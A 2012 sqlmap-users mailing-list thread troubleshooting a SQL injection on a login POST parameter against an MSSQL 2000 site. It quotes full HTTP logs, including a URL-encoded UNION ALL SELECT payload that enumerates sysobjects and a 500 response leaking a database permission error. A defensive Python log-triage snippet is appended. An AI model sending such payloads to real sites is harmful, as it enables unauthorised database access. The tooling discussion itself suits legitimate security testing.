Re: [sqlmap-users] Injection on Post Parameter MSSQL 2000 Enumerating Tables issue
From: Miroslav S. <mir...@gm...> - 2012-02-22 06:46:20
P.s. http://support.microsoft.com/kb/240872

This is a classic permission error. I am more than keen to see how Havij does this.

Waiting for your reply

Kind regards,
Miroslav Stampar

On Feb 22, 2012 7:38 AM, "Miroslav Stampar" <mir...@gm...> wrote:

> Hi.
>
> As there is no DBUSERNAME in the request I would say that the request is
> not the problem here. Now, I am interested how Havij manages it though.
>
> Is there a way for you to provide me privately with either: target url or
> untouched traffic file together with Burp log for Havij run against that
> target?
>
> Without more info I won't be able to help you more
>
> Kind regards,
> Miroslav Stampar
> On Feb 21, 2012 10:25 PM, "John Booth" <sql...@ho...> wrote:
>
>> DBUSERNAME = database user name
>> DATABASENAME = name of the current database
>>
>> let me know if this is not helpful or if you need the snippet of html
>> (which is just the homepage)
>>
>> HTTP request [#1]:
>> POST /index.asp?action=auth HTTP/1.1
>> Accept-Encoding: identity
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>> Host: site.com
>> Accept-language: en-us,en;q=0.5
>> Pragma: no-cache
>> Cache-control: no-cache,no-store
>> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
>> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
>> Connection: close
>>
>> UN=admin&PW=admin&x=0&y=0
>>
>> HTTP response [#1] (200 OK):
>> Content-length: 7091
>> X-powered-by: ASP.NET
>> Set-cookie: sitecom=0; path=/,
>> ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/
>> Age: 6
>> Uri: http://site.com:80/index.asp?action=auth
>> Server: Microsoft-IIS/6.0
>> Connection: close
>> Cache-control: private
>> Date: Tue, 21 Feb 2012 21:15:23 GMT
>> Content-type: text/html
>>
>> **
>>
>> HTML OF HOMEPAGE - if relevant will add
>>
>> **
>>
>> ############################################################################
>>
>> HTTP request [#2]:
>> POST /index.asp?action=auth HTTP/1.1
>> Accept-Encoding: identity
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>> Host: site.com
>> Accept-language: en-us,en;q=0.5
>> Pragma: no-cache
>> Cache-control: no-cache,no-store
>> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
>> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
>> Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0
>> Connection: close
>>
>> UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2
>> 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN
>> NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2
>> 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0
>>
>> HTTP response [#2] (500 Internal Server Error):
>> Content-length: 480
>> X-powered-by: ASP.NET
>> Set-cookie: sitecom=0; path=/
>> Age: 2
>> Uri: http://www.site.com:80/index.asp?action=auth
>> Server: Microsoft-IIS/6.0
>> Connection: close
>> Cache-control: private, no-store
>> Date: Tue, 21 Feb 2012 21:15:28 GMT
>> Content-type: text/html
>>
>> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
>> <html>
>> <head>
>> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
>>
>> <font face="Arial" size=2>
>> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial"
>> size=2>error '80004005'</font>
>> <p>
>> <font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in
>> database 'DATABASENAME'.</font>
>> <p>
>> <font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>,
>> line 16</font>
>>
>> ############################################################################
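The check made in the reply above (does the name in the database error appear anywhere in the request?) can be run over a traffic log in the layout quoted in this thread, which also flags every 5xx response that discloses a SQL Server error to the client. This is an added example, not part of the original messages or of sqlmap; the log text, `APPLOGIN`, `APPDB` and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in the traffic-log layout quoted above; all names are placeholders.
SAMPLE_LOG = """HTTP request [#1]:
POST /index.asp?action=auth HTTP/1.1

UN=admin&PW=admin&x=0&y=0
HTTP response [#1] (200 OK):
Content-type: text/html
HTTP request [#2]:
POST /index.asp?action=auth HTTP/1.1

UN=admin&PW=%27%20FROM%20APPDB..sysobjects--&x=0&y=0
HTTP response [#2] (500 Internal Server Error):
Content-type: text/html

<p>Microsoft OLE DB Provider for SQL Server</font> <font size=2>error '80004005'</font>
<p><font size=2>Server user 'APPLOGIN' is not a valid user in database 'APPDB'.</font>
"""

BLOCK = re.compile(r"^HTTP (request|response) \[#(\d+)\](?: \((\d{3})[^)]*\))?:[ \t]*$", re.M)
DB_ERROR = re.compile(r"Microsoft OLE DB Provider for SQL Server error '(\w+)' (.*?\.)(?= |$)")

def parse_exchanges(log):
    """Group the log into {number: {"request": str, "response": str, "status": int}}."""
    parts, out = BLOCK.split(log), {}  # [pre, kind, num, status, text, kind, ...]
    for kind, num, status, text in zip(parts[1::4], parts[2::4], parts[3::4], parts[4::4]):
        out.setdefault(int(num), {})[kind] = text.strip()
        if status:
            out[int(num)]["status"] = int(status)
    return out

def db_error(body):
    """Return (code, message) when the body discloses a SQL Server OLE DB error, else None."""
    m = DB_ERROR.search(re.sub(r"(<[^>]+>|\s)+", " ", body))  # drop tags, collapse whitespace
    return m.groups() if m else None

def triage(log):
    """Flag 5xx exchanges leaking a DB error; sort quoted names by whether the request sent them."""
    findings = []
    for num, ex in sorted(parse_exchanges(log).items()):
        err = db_error(ex.get("response", ""))
        if ex.get("status", 0) >= 500 and err:
            sent = unquote_plus(ex.get("request", "")).lower()
            names = re.findall(r"'([^']+)'", err[1])
            findings.append({"exchange": num, "code": err[0], "message": err[1],
                             "from_request": [n for n in names if n.lower() in sent],
                             "server_side": [n for n in names if n.lower() not in sent]})
    return findings
```

A name listed under `server_side` was never sent by the client, so it points at the server's own login-to-database mapping, and any finding at all means the application is returning raw provider errors that should be replaced with a generic error page.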